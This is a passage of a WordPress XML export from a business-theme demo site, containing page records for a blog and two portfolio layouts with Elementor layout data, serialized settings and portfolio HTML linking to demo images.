services.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"70","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"2b3ff2b","elType":"widget","settings":{"cf7":"736","_padding":{"unit":"px","top":"60","right":"60","bottom":"60","left":"60","isLinked":true},"_padding_mobile":{"unit":"px","top":"30","right":"20","bottom":"30","left":"20","isLinked":false},"_background_background":"classic","_background_color":"#FFFFFF","_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"_box_shadow_box_shadow_type":"yes","_box_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":30,"spread":0,"color":"rgba(0, 0, 0, 0.12)"}},"elements":[],"widgetType":"ictf7"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:8:{s:5:"image";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:13:"section_image";a:3:{s:5:"image";i:1;s:10:"image_size";i:1;s:5:"align";i:1;}}s:5:"style";a:1:{s:19:"section_style_image";a:1:{s:12:"width_tablet";i:1;}}}}s:6:"column";a:3:{s:5:"count";i:7;s:15:"control_percent";i:0;s:8:"controls";a:2:{s:6:"layout";a:1:{s:6:"layout";a:3:{s:12:"_inline_size";i:7;s:19:"_inline_size_tablet";i:6;s:19:"_inline_size_mobile";i:4;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:1:{s:13:"margin_tablet";i:2;}}}}s:7:"heading";a:3:{s:5:"count";i:4;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:4;s:11:"header_size";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:8:"_padding";i:4;s:15:"_padding_mobile";i:2;}}s:5:"style";a:1:{s:19:"section_title_style";a:6:{s:11:"title_color";i:1;s:21:"typography_typography";i:1;s:22:"typography_font_family";i:1;s:20:"typography_font_size";i:1;s:22:"typography_font_weight";i:1;s:25:"typography_text_transform";i:1;}}}}s:11:"text-editor";a:3:{s:5:"count";i:3;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:14:"section_editor";a:1:{s:6:"editor";i:3;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:8:"_padding";i:2;s:15:"_padding_mobile";i:1;}}}}s:12:"social-icons";a:3:{s:5:"count";i:1;s:15:"control_percent";i:6;s:8:"controls";a:3:{s:7:"content";a:1:{s:19:"section_social_icon";a:3:{s:16:"social_icon_list";i:1;s:7:"columns";i:1;s:5:"align";i:1;}}s:5:"style";a:2:{s:20:"section_social_style";a:9:{s:10:"icon_color";i:1;s:18:"icon_primary_color";i:1;s:20:"icon_secondary_color";i:1;s:9:"icon_size";i:1;s:12:"icon_spacing";i:1;s:19:"image_border_border";i:1;s:18:"image_border_width";i:1;s:18:"image_border_color";i:1;s:13:"border_radius";i:1;}s:20:"section_social_hover";a:1:{s:18:"hover_border_color";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:15:"_padding_mobile";i:1;}}}}s:7:"section";a:3:{s:5:"count";i:3;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:6:"layout";a:2:{s:14:"section_layout";a:3:{s:6:"layout";i:2;s:3:"gap";i:3;s:16:"content_position";i:1;}s:17:"section_structure";a:1:{s:9:"structure";i:2;}}s:5:"style";a:1:{s:14:"section_border";a:2:{s:26:"box_shadow_box_shadow_type";i:1;s:21:"box_shadow_box_shadow";i:1;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:2:{s:14:"padding_mobile";i:3;s:7:"padding";i:2;}}}}s:9:"iprogress";a:3:{s:5:"count";i:4;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:3:{s:9:"bar_style";i:4;s:5:"title";i:4;s:7:"percent";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:15:"_padding_mobile";i:3;s:15:"_padding_tablet";i:2;}}s:5:"style";a:2:{s:17:"bar_style_section";a:1:{s:9:"bar_color";i:4;}s:18:"style_text_section";a:2:{s:27:"title_typography_typography";i:4;s:26:"title_typography_font_size";i:4;}}}}s:5:"ictf7";a:3:{s:5:"count";i:1;s:15:"control_percent";i:4;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"section_content";a:1:{s:3:"cf7";i:1;}}s:8:"advanced";a:3:{s:14:"_section_style";a:2:{s:8:"_padding";i:1;s:15:"_padding_mobile";i:1;}s:19:"_section_background";a:2:{s:22:"_background_background";i:1;s:17:"_background_color";i:1;}s:15:"_section_border";a:3:{s:14:"_border_radius";i:1;s:27:"_box_shadow_box_shadow_type";i:1;s:22:"_box_shadow_box_shadow";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[2028]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Blog</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/blog/</link>
		<pubDate>Thu, 10 Sep 2020 09:26:49 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?page_id=768</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>768</wp:post_id>
		<wp:post_date><![CDATA[2020-09-10 09:26:49]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-10 09:26:49]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[blog]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[page]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[page_layout]]></wp:meta_key>
		<wp:meta_value><![CDATA[full-content]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[is_trans]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[#ffffff]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[770]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Portfolio Grid</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/portfolio-grid/</link>
		<pubDate>Fri, 11 Sep 2020 07:25:08 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?page_id=847</guid>
		<description></description>
		<content:encoded><![CDATA[our portfolio
<h3>Our Latest Case Studies</h3>
<ul>
 	<li><a href="#" data-filter="*">All</a></li>
 	<li>
								<a href="#" data-filter=".category-15">business</a></li>
 	<li>
								<a href="#" data-filter=".category-16">finance</a></li>
 	<li>
								<a href="#" data-filter=".category-17">marketing</a></li>
 	<li>
								<a href="#" data-filter=".category-19">startup</a></li>
 	<li>
								<a href="#" data-filter=".category-20">strategy</a></li>
</ul>
<a href="http://wpdemo.archiwp.com/maxbizz-business/portfolio/business-consultation/">
<img width="600" height="600" src="https://maxbizz.s3.amazonaws.com/images/project1-1-600x600.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project1-1-600x600.jpg 600w, https://maxbizz.s3.amazonaws.com/images/project1-1-300x300.jpg 300w, https://maxbizz.s3.amazonaws.com/images/project1-1-1024x1024.jpg 1024w, https://maxbizz.s3.amazonaws.com/images/project1-1-150x150.jpg 150w, https://maxbizz.s3.amazonaws.com/images/project1-1-768x768.jpg 768w, https://maxbizz.s3.amazonaws.com/images/project1-1-1200x1200.jpg 1200w, https://maxbizz.s3.amazonaws.com/images/project1.jpg 1420w" sizes="(max-width: 600px) 100vw, 600px">			</a>
<a href="http://wpdemo.archiwp.com/maxbizz-business/portfolio/business-consultation/"></a>
<a href="http://wpdemo.archiwp.com/maxbizz-business/portfolio/business-consultation/"></a>
<h5><a href="http://wpdemo.archiwp.com/maxbizz-business/portfolio/business-consultation/">Business Consultation</a></h5>
/ <a href="http://wpdemo.archiwp.com/maxbizz-business/portfolio-cat/business/">business</a> / <a href="http://wpdemo.archiwp.com/maxbizz-business/portfolio-cat/finance/">finance</a>

<a href="http://wpdemo.archiwp.com/maxbizz-business/portfolio/finance-strategy/">
<img width="600" height="600" src="https://maxbizz.s3.amazonaws.com/images/project2-1-600x600.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project2-1-600x600.jpg 600w, https://maxbizz.s3.amazonaws.com/images/project2-1-150x150.jpg 150w, https://maxbizz.s3.amazonaws.com/images/project2-1-1200x1200.jpg 1200w" sizes="(max-width: 600px) 100vw, 600px">			</a>
<a href="http://wpdemo.archiwp.com/maxbizz-business/portfolio/finance-strategy/"></a>
<a href="http://wpdemo.archiwp.com/maxbizz-business/portfolio/finance-strategy/"></a>
<h5><a href="http://wpdemo.archiwp.com/maxbizz-business/portfolio/finance-strategy/">Finance Strategy</a></h5>
/ <a href="http://wpdemo.archiwp.com/maxbizz-business/portfolio-cat/finance/">finance</a> / <a href="http://wpdemo.archiwp.com/maxbizz-business/portfolio-cat/marketing/">marketing</a>

<a href="http://wpdemo.archiwp.com/maxbizz-business/portfolio/digital-marketing/">
<img width="600" height="600" src="https://maxbizz.s3.amazonaws.com/images/project-3-1-600x600.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project-3-1-600x600.jpg 600w, https://maxbizz.s3.amazonaws.com/images/project-3-1-300x300.jpg 300w, https://maxbizz.s3.amazonaws.com/images/project-3-1-150x150.jpg 150w, https://maxbizz.s3.amazonaws.com/images/project-3.jpg 719w" sizes="(max-width: 600px) 100vw, 600px">			</a>
<a href="http://wpdemo.archiwp.com/maxbizz-business/portfolio/digital-marketing/"></a>
<a href="http://wpdemo.archiwp.com/maxbizz-business/portfolio/digital-marketing/"></a>
<h5><a href="http://wpdemo.archiwp.com/maxbizz-business/portfolio/digital-marketing/">Digital Marketing</a></h5>
/ <a href="http://wpdemo.archiwp.com/maxbizz-business/portfolio-cat/finance/">finance</a> / <a href="http://wpdemo.archiwp.com/maxbizz-business/portfolio-cat/marketing/">marketing</a>

<a href="http://wpdemo.archiwp.com/maxbizz-business/portfolio/enterprise-loan/">
<img width="600" height="600" src="https://maxbizz.s3.amazonaws.com/images/project-4-1-600x600.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project-4-1-600x600.jpg 600w, https://maxbizz.s3.amazonaws.com/images/project-4-1-150x150.jpg 150w" sizes="(max-width: 600px) 100vw, 600px">			</a>
<a href="http://wpdemo.archiwp.com/maxbizz-business/portfolio/enterprise-loan/"></a>
<a href="http://wpdemo.archiwp.com/maxbizz-business/portfolio/enterprise-loan/"></a>
<h5><a href="http://wpdemo.archiwp.com/maxbizz-business/portfolio/enterprise-loan/">Enterprise Loan</a></h5>
/ <a href="http://wpdemo.archiwp.com/maxbizz-business/portfolio-cat/business/">business</a> / <a href="http://wpdemo.archiwp.com/maxbizz-business/portfolio-cat/marketing/">marketing</a>

<a href="http://wpdemo.archiwp.com/maxbizz-business/portfolio/data-analytics/">
<img width="600" height="600" src="https://maxbizz.s3.amazonaws.com/images/project-6-1-600x600.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project-6-1-600x600.jpg 600w, https://maxbizz.s3.amazonaws.com/images/project-6-1-300x300.jpg 300w, https://maxbizz.s3.amazonaws.com/images/project-6-1-150x150.jpg 150w, https://maxbizz.s3.amazonaws.com/images/project-6.jpg 605w" sizes="(max-width: 600px) 100vw, 600px">			</a>
<a href="http://wpdemo.archiwp.com/maxbizz-business/portfolio/data-analytics/"></a>
<a href="http://wpdemo.archiwp.com/maxbizz-business/portfolio/data-analytics/"></a>
<h5><a href="http://wpdemo.archiwp.com/maxbizz-business/portfolio/data-analytics/">Data Analytics</a></h5>
/ <a href="http://wpdemo.archiwp.com/maxbizz-business/portfolio-cat/startup/">startup</a> / <a href="http://wpdemo.archiwp.com/maxbizz-business/portfolio-cat/strategy/">strategy</a>

<a href="http://wpdemo.archiwp.com/maxbizz-business/portfolio/fund-management/">
<img width="600" height="600" src="https://maxbizz.s3.amazonaws.com/images/project-5-1-600x600.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project-5-1-600x600.jpg 600w, https://maxbizz.s3.amazonaws.com/images/project-5-1-150x150.jpg 150w" sizes="(max-width: 600px) 100vw, 600px">			</a>
<a href="http://wpdemo.archiwp.com/maxbizz-business/portfolio/fund-management/"></a>
<a href="http://wpdemo.archiwp.com/maxbizz-business/portfolio/fund-management/"></a>
<h5><a href="http://wpdemo.archiwp.com/maxbizz-business/portfolio/fund-management/">Fund Management</a></h5>
/ <a href="http://wpdemo.archiwp.com/maxbizz-business/portfolio-cat/finance/">finance</a> / <a href="http://wpdemo.archiwp.com/maxbizz-business/portfolio-cat/startup/">startup</a>

Load More]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>847</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 07:25:08]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 07:25:08]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[portfolio-grid]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[page]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[page_layout]]></wp:meta_key>
		<wp:meta_value><![CDATA[full-content]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[is_trans]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[#ffffff]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.12]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"0238f9e","elType":"section","settings":{"padding":{"unit":"px","top":"95","right":"0","bottom":"110","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"80","right":"0","bottom":"80","left":"0","isLinked":false}},"elements":[{"id":"513ab33","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"e2dfe3b","elType":"widget","settings":{"sub":"our portfolio","title":"Our Latest Case Studies","header_size":"h3","align":"center","_padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"stitle_bg":"#4B83FC1A","title_typography_typography":"custom","title_typography_font_size_mobile":{"unit":"px","size":30,"sizes":[]},"is_highlight":"","stitle_typography_typography":"custom","stitle_typography_font_size":{"unit":"px","size":14,"sizes":[]}},"elements":[],"widgetType":"iheading"},{"id":"5d7a201","elType":"widget","settings":{"all_text":"All","load_more":"Load More","loading_more":"Loading...","w_gaps_mobile":{"unit":"px","size":15,"sizes":[]},"position":"","filter_typography_typography":"custom","filter_typography_font_size_mobile":{"unit":"px","size":13,"sizes":[]},"overlay_background":"#D9230099"},"elements":[],"widgetType":"ipfilter"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:4:{s:8:"iheading";a:3:{s:5:"count";i:1;s:15:"control_percent";i:5;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:4:{s:3:"sub";i:1;s:5:"title";i:1;s:11:"header_size";i:1;s:5:"align";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}s:5:"style";a:1:{s:13:"style_section";a:6:{s:9:"stitle_bg";i:1;s:27:"title_typography_typography";i:1;s:33:"title_typography_font_size_mobile";i:1;s:12:"is_highlight";i:1;s:28:"stitle_typography_typography";i:1;s:27:"stitle_typography_font_size";i:1;}}}}s:8:"ipfilter";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"content_section";a:1:{s:13:"w_gaps_mobile";i:1;}}s:5:"style";a:2:{s:21:"overlay_style_section";a:2:{s:8:"position";i:1;s:18:"overlay_background";i:1;}s:20:"filter_style_section";a:2:{s:28:"filter_typography_typography";i:1;s:34:"filter_typography_font_size_mobile";i:1;}}}}s:6:"column";a:3:{s:5:"count";i:1;s:15:"control_percent";i:0;s:8:"controls";a:1:{s:6:"layout";a:1:{s:6:"layout";a:1:{s:12:"_inline_size";i:1;}}}}s:7:"section";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:8:"advanced";a:1:{s:16:"section_advanced";a:2:{s:7:"padding";i:1;s:14:"padding_mobile";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[2026]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Portfolio Masonry</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/portfolio-masonry/</link>
		<pubDate>Fri, 11 Sep 2020 07:45:24 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?page_id=858</guid>
		<description></description>
		<content:encoded><![CDATA[our portfolio
<h3>Our Latest Case Studies</h3>
<ul>
 	<li><a href="#" data-filter="*">All</a></li>
 	<li>
								<a href="#" data-filter=".category-15">business</a></li>
 	<li>
								<a href="#" data-filter=".category-16">finance</a></li>
 	<li>
								<a href="#" data-filter=".category-17">marketing</a></li>
 	<li>
								<a href="#" data-filter=".category-19">startup</a></li>
 	<li>
								<a href="#" data-filter=".category-20">strategy</a></li>
</ul>
<a href="http://wpdemo.archiwp.com/maxbizz-business/portfolio/business-consultation/">
<img width="1420" height="1420" src="https://maxbizz.s3.amazonaws.com/images/project1.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project1.jpg 1420w, https://maxbizz.s3.amazonaws.com/images/project1-1-300x300.jpg 300w, https://maxbizz.s3.amazonaws.com/images/project1-1-1024x1024.jpg 1024w, https://maxbizz.s3.amazonaws.com/images/project1-1-150x150.jpg 150w, https://maxbizz.s3.amazonaws.com/images/project1-1-768x768.jpg 768w, https://maxbizz.s3.amazonaws.com/images/project1-1-600x600.jpg 600w, https://maxbizz.s3.amazonaws.com/images/project1-1-1200x1200.jpg 1200w" sizes="(max-width: 1420px) 100vw, 1420px">			</a>
<a href="http://wpdemo.archiwp.com/maxbizz-business/portfolio/business-consultation/"></a>
<a href="http://wpdemo.archiwp.com/maxbizz-business/portfolio/business-consultation/"></a>
<h5><a href="http://wpdemo.archiwp.com/maxbizz-business/portfolio/business-consultation/">Business Consultation</a></h5>
/ <a href="http://wpdemo.archiwp.com/maxbizz-business/portfolio-cat/business/">business</a> / <a href="http://wpdemo.archiwp.com/maxbizz-business/portfolio-cat/finance/">finance</a>

<a href="http://wpdemo.archiwp.com/maxbizz-business/portfolio/finance-strategy/">
<img width="1420" height="1630" src="https://maxbizz.s3.amazonaws.com/images/project2.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project2.jpg 1420w, https://maxbizz.s3.amazonaws.com/images/project2-1-261x300.jpg 261w, https://maxbizz.s3.amazonaws.com/images/project2-1-892x1024.jpg 892w, https://maxbizz.s3.amazonaws.com/images/project2-1-768x882.jpg 768w, https://maxbizz.s3.amazonaws.com/images/project2-1-1338x1536.jpg 1338w" sizes="(max-width: 1420px) 100vw, 1420px">			</a>
<a href="http://wpdemo.archiwp.com/maxbizz-business/portfolio/finance-strategy/"></a>
<a href="http://wpdemo.archiwp.com/maxbizz-business/portfolio/finance-strategy/"></a>
<h5><a href="http://wpdemo.archiwp.com/maxbizz-business/portfolio/finance-strategy/">Finance Strategy</a></h5>
/ <a href="http://wpdemo.archiwp.com/maxbizz-business/portfolio-cat/finance/">finance</a> / <a href="http://wpdemo.archiwp.com/maxbizz-business/portfolio-cat/marketing/">marketing</a>

<a href="http://wpdemo.archiwp.com/maxbizz-business/portfolio/digital-marketing/">
<img width="719" height="719" src="https://maxbizz.s3.amazonaws.com/images/project-3.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project-3.jpg 719w, https://maxbizz.s3.amazonaws.com/images/project-3-1-300x300.jpg 300w, https://maxbizz.s3.amazonaws.com/images/project-3-1-150x150.jpg 150w, https://maxbizz.s3.amazonaws.com/images/project-3-1-600x600.jpg 600w" sizes="(max-width: 719px) 100vw, 719px">			</a>
<a href="http://wpdemo.archiwp.com/maxbizz-business/portfolio/digital-marketing/"></a>
<a href="http://wpdemo.archiwp.com/maxbizz-business/portfolio/digital-marketing/"></a>
<h5><a href="http://wpdemo.archiwp.com/maxbizz-business/portfolio/digital-marketing/">Digital Marketing</a></h5>
/ <a href="http://wpdemo.archiwp.com/maxbizz-business/portfolio-cat/finance/">finance</a> / <a href="http://wpdemo.archiwp.com/maxbizz-business/portfolio-cat/marketing/">marketing</a>

<a href="http://wpdemo.archiwp.com/maxbizz-business/portfolio/enterprise-loan/">
<img width="719" height="797" src="https://maxbizz.s3.amazonaws.com/images/project-4.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project-4.jpg 719w, https://maxbizz.s3.amazonaws.com/images/project-4-1-271x300.jpg 271w" sizes="(max-width: 719px) 100vw, 719px">			</a>
<a href="http://wpdemo.archiwp.com/maxbizz-business/portfolio/enterprise-loan/"></a>
<a href="http://wpdemo.archiwp.com/maxbizz-business/portfolio/enterprise-loan/"></a>
<h5><a href="http://wpdemo.archiwp.com/maxbizz-business/portfolio/enterprise-loan/">Enterprise Loan</a></h5>
/ <a href="http://wpdemo.archiwp.com/maxbizz-business/portfolio-cat/business/">business</a> / <a href="http://wpdemo.archiwp.com/maxbizz-business/portfolio-cat/marketing/">marketing</a>

<a href="http://wpdemo.archiwp.com/maxbizz-business/portfolio/data-analytics/">
<img width="605" height="605" src="https://maxbizz.s3.amazonaws.com/images/project-6.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project-6.jpg 605w, https://maxbizz.s3.amazonaws.com/images/project-6-1-300x300.jpg 300w, https://maxbizz.s3.amazonaws.com/images/project-6-1-150x150.jpg 150w, https://maxbizz.s3.amazonaws.com/images/project-6-1-600x600.jpg 600w" sizes="(max-width: 605px) 100vw, 605px">			</a>
<a href="http://wpdemo.archiwp.com/maxbizz-business/portfolio/data-analytics/"></a>
<a href="http://wpdemo.archiwp.com/maxbizz-business/portfolio/data-analytics/"></a>
<h5><a href="http://wpdemo.archiwp.com/maxbizz-business/portfolio/data-analytics/">Data Analytics</a></h5>
/ <a href="http://wpdemo.archiwp.com/maxbizz-business/portfolio-cat/startup/">startup</a> / <a href="http://wpdemo.archiwp.com/maxbizz-business/portfolio-cat/strategy/">strategy</a>

<a href="http://wpdemo.archiwp.com/maxbizz-business/portfolio/fund-management/">
<img width="605" height="736" src="https://maxbizz.s3.amazonaws.com/images/project-5.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project-5.jpg 605w, https://maxbizz.s3.amazonaws.com/images/project-5-1-247x300.jpg 247w" sizes="(max-width: 605px) 100vw, 605px">			</a>
<a href="http://wpdemo.archiwp.com/maxbizz-business/portfolio/fund-management/"></a>
<a href="http://wpdemo.archiwp.com/maxbizz-business/portfolio/fund-management/"></a>
<h5><a href="http://wpdemo.archiwp.com/maxbizz-business/portfolio/fund-management/">Fund Management</a></h5>
/ <a href="http://wpdemo.archiwp.com/maxbizz-business/portfolio-cat/finance/">finance</a> / <a href="http://wpdemo.archiwp.com/maxbizz-business/portfolio-cat/startup/">startup</a>

Load More]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>858</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 07:45:24]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 07:45:24]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[portfolio-masonry]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[page]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[page_layout]]></wp:meta_key>
		<wp:meta_value><![CDATA[full-content]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[is_trans]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[#ffffff]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.13]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
